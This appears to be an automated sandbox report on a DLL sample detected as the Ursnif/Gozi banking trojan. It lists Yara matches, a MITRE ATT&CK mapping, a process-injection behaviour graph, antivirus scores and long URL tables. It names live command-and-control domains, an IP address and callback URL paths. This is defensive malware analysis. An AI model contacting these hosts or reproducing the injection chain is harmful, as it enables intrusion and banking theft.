            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Valid Accounts1Valid Accounts1DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Access Token Manipulation1Masquerading1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsPowerShell1Logon Script (Mac)Process Injection813Valid Accounts1NTDSSystem Information Discovery45Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptAccess Token Manipulation1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection813DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 322295 Sample: onerous.tar.dll Startdate: 24/11/2020 Architecture: WINDOWS Score: 100 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Antivirus / Scanner detection for submitted sample 2->74 76 8 other signatures 2->76 8 mshta.exe 19 2->8         started        11 loaddll32.exe 1 2->11         started        13 iexplore.exe 1 55 2->13         started        16 iexplore.exe 2 82 2->16         started        process3 dnsIp4 92 Suspicious powershell command line found 8->92 18 powershell.exe 2 32 8->18         started        94 Detected Gozi e-Banking trojan 11->94 96 Writes to foreign memory regions 11->96 98 Allocates memory in foreign processes 11->98 100 5 other signatures 11->100 22 control.exe 11->22         started        58 192.168.2.1 unknown unknown 13->58 24 iexplore.exe 29 13->24         started        27 iexplore.exe 30 13->27         started        29 iexplore.exe 39 16->29         started        signatures5 process6 dnsIp7 48 C:\Users\user\AppData\Local\...\jery0dbp.0.cs, UTF-8 18->48 dropped 50 C:\Users\user\AppData\...\1453igkk.cmdline, UTF-8 18->50 dropped 78 Injects code into the Windows Explorer (explorer.exe) 18->78 80 Writes to foreign memory regions 18->80 82 Modifies the context of a thread in another process (thread injection) 18->82 84 Compiles code for process injection (via .Net compiler) 18->84 31 explorer.exe 18->31 injected 35 csc.exe 18->35         started        38 csc.exe 18->38         started        40 conhost.exe 18->40         started        86 Changes memory attributes in foreign processes to executable or writable 22->86 88 Maps a DLL or memory area into another process 22->88 90 Creates a thread in another existing process (thread injection) 22->90 56 api10.laptok.at 47.241.19.44, 49732, 49733, 49750 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 29->56 file8 signatures9 process10 dnsIp11 60 c56.lepini.at 31->60 62 Changes memory attributes in foreign processes to executable or writable 31->62 64 Writes to foreign memory regions 31->64 66 Allocates memory in foreign processes 31->66 68 4 other signatures 31->68 42 RuntimeBroker.exe 31->42 injected 52 C:\Users\user\AppData\Local\...\1453igkk.dll, PE32 35->52 dropped 44 cvtres.exe 35->44         started        54 C:\Users\user\AppData\Local\...\jery0dbp.dll, PE32 38->54 dropped 46 cvtres.exe 38->46         started        file12 signatures13 process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            onerous.tar.dll48%VirustotalBrowse
            onerous.tar.dll58%ReversingLabsWin32.Trojan.Razy
            onerous.tar.dll100%AviraTR/Crypt.XDR.Gen
            onerous.tar.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            c56.lepini.at12%VirustotalBrowse
            api10.laptok.at12%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf0%Avira URL Cloudsafe
            http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM0%Avira URL Cloudsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            c56.lepini.at
            		47.241.19.44
            		truetrueunknown
            api10.laptok.at
            		47.241.19.44
            		truefalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              		high
              http://www.mercadolivre.com.br/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://search.ebay.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                		high
                http://www.mtv.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                  		high
                  http://www.rambler.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                    		high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                      		high
                      http://www.dailymail.co.uk/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                        		high
                        http://buscar.ya.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                          		high
                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                            		high
                            http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		low
                            http://www.sogou.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://asp.usatoday.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                  		high
                                  http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://fr.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                    		high
                                    http://rover.ebay.comexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                      		high
                                      http://in.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                        		high
                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                          		high
                                          http://search.ebay.in/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                            		high
                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://%s.comexplorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              http://msk.afisha.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.reddit.com/msapplication.xml4.3.drfalse
                                                    		high
                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://search.rediff.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.daum.net/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://buscar.ozu.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.about.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://busca.igbusca.com.br/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.ask.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.cjmall.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.centrum.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.carterandcone.comlexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://suche.t-online.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.amazon.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://sads.myspace.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
